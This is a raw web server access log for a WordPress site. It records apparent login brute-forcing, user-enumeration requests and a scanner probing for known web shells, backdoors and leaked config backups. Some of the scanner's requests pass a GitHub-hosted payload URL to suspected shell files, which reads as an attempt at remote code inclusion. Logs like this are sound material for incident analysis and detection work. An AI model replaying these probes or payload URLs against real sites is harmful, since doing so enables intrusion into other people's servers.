103.200.23.120 - - [26/Oct/2022:14:55:54 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
103.200.23.120 - - [26/Oct/2022:14:55:49 -0700] "GET /wp-login.php HTTP/1.1" 200 7989 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
103.200.23.120 - - [26/Oct/2022:14:55:50 -0700] "GET /wp-login.php HTTP/1.1" 200 7992 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
103.200.23.120 - - [26/Oct/2022:14:55:55 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
103.200.23.120 - - [26/Oct/2022:14:55:55 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
103.200.23.120 - - [26/Oct/2022:14:55:55 -0700] "POST /wp-login.php HTTP/1.1" 200 8262 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
103.200.23.120 - - [26/Oct/2022:14:55:56 -0700] "POST /wp-login.php HTTP/1.1" 200 8261 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
103.200.23.120 - - [26/Oct/2022:14:55:56 -0700] "POST /wp-login.php HTTP/1.1" 200 8259 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
210.3.93.122 - - [26/Oct/2022:15:07:16 -0700] "GET /wp-login.php HTTP/1.1" 200 7985 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
210.3.93.122 - - [26/Oct/2022:15:07:21 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
210.3.93.122 - - [26/Oct/2022:15:07:22 -0700] "POST /wp-login.php HTTP/1.1" 200 8255 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
212.103.4.29 - - [26/Oct/2022:15:10:10 -0700] "POST /wp-login.php HTTP/1.1" 200 8261 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:15:10:14 -0700] "POST /wp-cron.php?doing_wp_cron=1666822214.8686549663543701171875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666822214.8686549663543701171875" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:15:13:45 -0700] "POST /wp-login.php HTTP/1.1" 200 8264 "-" "Mozilla/5.0" "gatipackers.com"
94.231.86.20 - - [26/Oct/2022:15:33:49 -0700] "POST /wp-login.php HTTP/1.1" 200 8260 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [26/Oct/2022:15:33:54 -0700] "POST /wp-cron.php?doing_wp_cron=1666823634.2878489494323730468750 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666823634.2878489494323730468750" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:15:34:13 -0700] "POST /wp-login.php HTTP/1.1" 500 4907 "-" "Mozilla/5.0" "gatipackers.com"
198.199.84.109 - - [26/Oct/2022:15:50:29 -0700] "GET /wp-login.php HTTP/1.1" 200 7991 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
198.199.84.109 - - [26/Oct/2022:15:50:35 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:15:50:33 -0700] "POST /wp-cron.php?doing_wp_cron=1666824633.6359069347381591796875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666824633.6359069347381591796875" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
198.199.84.109 - - [26/Oct/2022:15:50:35 -0700] "POST /wp-login.php HTTP/1.1" 200 8262 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:15:54:53 -0700] "POST /wp-login.php HTTP/1.1" 200 8256 "-" "Mozilla/5.0" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:15:54:57 -0700] "POST /wp-cron.php?doing_wp_cron=1666824897.2805109024047851562500 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666824897.2805109024047851562500" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:44 -0700] "GET /style.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:44 -0700] "GET /moduless.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:45 -0700] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:45 -0700] "GET /admin.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:46 -0700] "GET /index.php?3x=3x HTTP/1.1" 200 14533 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:50 -0700] "GET /boom.php?x HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:50 -0700] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:50 -0700] "GET /wp-content/db_cache.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:51 -0700] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:51 -0700] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:52 -0700] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:52 -0700] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:53 -0700] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:53 -0700] "GET /alfindex.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:54 -0700] "GET /alfa.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:54 -0700] "GET /wp-booking.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:55 -0700] "GET /cindex.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:55 -0700] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:56 -0700] "GET /wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:56 -0700] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:57 -0700] "GET /wp-includes/css/css.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:58 -0700] "GET /old-index.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:58 -0700] "GET /config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:55:59 -0700] "GET /wp-admin/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:00 -0700] "GET /wp-content/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:00 -0700] "GET /wp-includes/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:01 -0700] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:01 -0700] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:02 -0700] "POST /wp-includes/css/wp-config.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:02 -0700] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:03 -0700] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:03 -0700] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:03 -0700] "GET /haders.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:04 -0700] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:04 -0700] "GET /legion.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:05 -0700] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:05 -0700] "GET /wp-includes/lfx.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:05 -0700] "GET /wp-includes/small.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:06 -0700] "GET /up.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:06 -0700] "GET /upload.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:06 -0700] "GET /config.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:07 -0700] "GET /test.php?Ghost=send HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:07 -0700] "GET /wp-content/langar.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:08 -0700] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:08 -0700] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [26/Oct/2022:15:56:08 -0700] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
46.101.87.238 - - [26/Oct/2022:15:56:31 -0700] "GET /wp-login.php HTTP/1.1" 200 7986 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
46.101.87.238 - - [26/Oct/2022:15:56:34 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
139.59.96.126 - - [26/Oct/2022:15:57:27 -0700] "POST /wp-login.php HTTP/1.1" 200 8263 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36" "gatipackers.com"
116.118.50.135 - - [26/Oct/2022:16:12:38 -0700] "GET /wp-login.php HTTP/1.1" 200 7991 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
116.118.50.135 - - [26/Oct/2022:16:12:45 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:16:12:43 -0700] "POST /wp-cron.php?doing_wp_cron=1666825963.4832890033721923828125 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666825963.4832890033721923828125" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
116.118.50.135 - - [26/Oct/2022:16:12:46 -0700] "POST /wp-login.php HTTP/1.1" 200 8264 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:16:15:23 -0700] "POST /wp-login.php HTTP/1.1" 200 8258 "-" "Mozilla/5.0" "gatipackers.com"
95.217.179.54 - - [26/Oct/2022:16:21:07 -0700] "POST /wp-login.php HTTP/1.1" 200 8262 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" "gatipackers.com"
45.231.133.21 - - [26/Oct/2022:16:25:58 -0700] "GET /wp-login.php HTTP/1.1" 200 7989 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
45.231.133.21 - - [26/Oct/2022:16:26:03 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.209 - - [26/Oct/2022:16:26:01 -0700] "POST /wp-cron.php?doing_wp_cron=1666826761.6857569217681884765625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666826761.6857569217681884765625" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
45.231.133.21 - - [26/Oct/2022:16:26:04 -0700] "POST /wp-login.php HTTP/1.1" 200 8255 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
219.157.150.74 - - [26/Oct/2022:16:27:58 -0700] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "www.gatipackers.com"
4.240.125.106 - - [26/Oct/2022:16:35:47 -0700] "POST /wp-login.php HTTP/1.1" 500 4915 "-" "Mozilla/5.0" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:16:56:06 -0700] "POST /wp-login.php HTTP/1.1" 200 8259 "-" "Mozilla/5.0" "gatipackers.com"
10.213.116.209 - - [26/Oct/2022:16:56:10 -0700] "POST /wp-cron.php?doing_wp_cron=1666828570.5700230598449707031250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666828570.5700230598449707031250" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
